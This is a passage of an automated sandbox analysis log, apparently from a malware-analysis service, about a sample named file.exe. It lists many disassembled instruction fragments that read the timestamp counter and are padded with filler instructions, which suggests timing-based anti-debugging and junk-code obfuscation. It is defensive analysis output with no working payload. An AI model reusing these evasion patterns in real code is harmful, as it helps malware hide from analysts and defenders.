                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CBF56 second address: 13CBF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC08D second address: 13CC0B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAF1CBF1D4Bh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC0B6 second address: 13CC0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC0C5 second address: 13CC0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC0CB second address: 13CC0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC692 second address: 13CC698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC698 second address: 13CC6A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC6A8 second address: 13CC6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CD5EA second address: 13CD5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAF1CCF5658h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CD5F9 second address: 13CD603 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CDBDF second address: 13CDBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5666h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CDDF0 second address: 13CDDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CE271 second address: 13CE277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CE277 second address: 13CE27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CE3DB second address: 13CE3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CE5A3 second address: 13CE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CEEB6 second address: 13CEF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D26FAh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FAF1CCF5658h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e jmp 00007FAF1CCF5668h 0x00000033 mov edi, 0158D07Ah 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, ecx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jmp 00007FAF1CCF5665h 0x00000046 pop esi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF28 second address: 13CEF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF2E second address: 13CEF41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FAF1CCF5656h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF41 second address: 13CEF47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08B0 second address: 13D08EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF1CCF5658h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b and si, BD0Ah 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1245152Ah], ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08EF second address: 13D08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08F9 second address: 13D0905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0905 second address: 13D0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0909 second address: 13D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1F2A second address: 13D1F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1C7E second address: 13D1C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3209 second address: 13D3227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FAF1CBF1D58h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7559 second address: 13D756D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FAF1CCF5658h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D756D second address: 13D7573 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D46BC second address: 13D46C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9724 second address: 13D972A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D972A second address: 13D9747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9747 second address: 13D974B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA659 second address: 13DA663 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA663 second address: 13DA669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA669 second address: 13DA66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D991F second address: 13D9923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA82F second address: 13DA839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC6B7 second address: 13DC6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC6BD second address: 13DC6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD6AE second address: 13DD6B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD6B9 second address: 13DD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FAF1CCF5681h 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5660h 0x00000013 jmp 00007FAF1CCF5669h 0x00000018 popad 0x00000019 nop 0x0000001a adc edi, 32196C8Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAF1CCF5664h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAF1CCF5658h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2FA7h], eax 0x00000049 push eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD741 second address: 13DD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE76F second address: 13DE774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE774 second address: 13DE779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD89A second address: 13DD8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE983 second address: 13DE994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE994 second address: 13DE9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FAF1CCF5669h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A18 second address: 13E1A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A1C second address: 13E1A43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 adc bl, FFFFFF91h 0x00000016 push 00000000h 0x00000018 mov bx, 6B48h 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e pushad 0x0000001f je 00007FAF1CCF5656h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A43 second address: 13E1A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E28EE second address: 13E28F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E28F2 second address: 13E2900 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2900 second address: 13E2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E38DA second address: 13E38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4852 second address: 13E486E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E486E second address: 13E48E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FAF1CBF1D48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bh, 61h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FAF1CBF1D48h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov bx, E329h 0x0000004a jmp 00007FAF1CBF1D4Eh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48E9 second address: 13E48ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48ED second address: 13E48F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48F1 second address: 13E48F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48F7 second address: 13E4919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4919 second address: 13E491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E491E second address: 13E4928 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0BF0 second address: 13E0C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAF1CCF5658h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FAF1CCF5668h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+122D2BB1h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2A1Dh] 0x00000046 mov eax, dword ptr [ebp+122D05D9h] 0x0000004c cmc 0x0000004d push FFFFFFFFh 0x0000004f sub bh, 00000011h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2A90 second address: 13E2A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E58B9 second address: 13E58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2B56 second address: 13E2B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E58BE second address: 13E58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5662h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2B5A second address: 13E2B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AA5 second address: 13E3AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AA9 second address: 13E3AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AAF second address: 13E3AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AB9 second address: 13E3ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FAF1CBF1D46h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3ACE second address: 13E3AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B10 second address: 13E5B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC767 second address: 13EC76E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC09 second address: 13EEC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF1CBF1D53h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC39 second address: 13EEC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138AA70 second address: 138AA7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4344 second address: 13F4364 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF5662h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4364 second address: 13F4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4368 second address: 13F436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4484 second address: 13F449F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF1CBF1D53h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F449F second address: 13F44A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A38 second address: 13E7A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A53 second address: 13E7A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A57 second address: 13E7A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9D00 second address: 13F9D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE920 second address: 13FE94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF1CBF1D4Fh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jne 00007FAF1CBF1D46h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF1CBF1D4Dh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE94D second address: 13FE975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5669h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
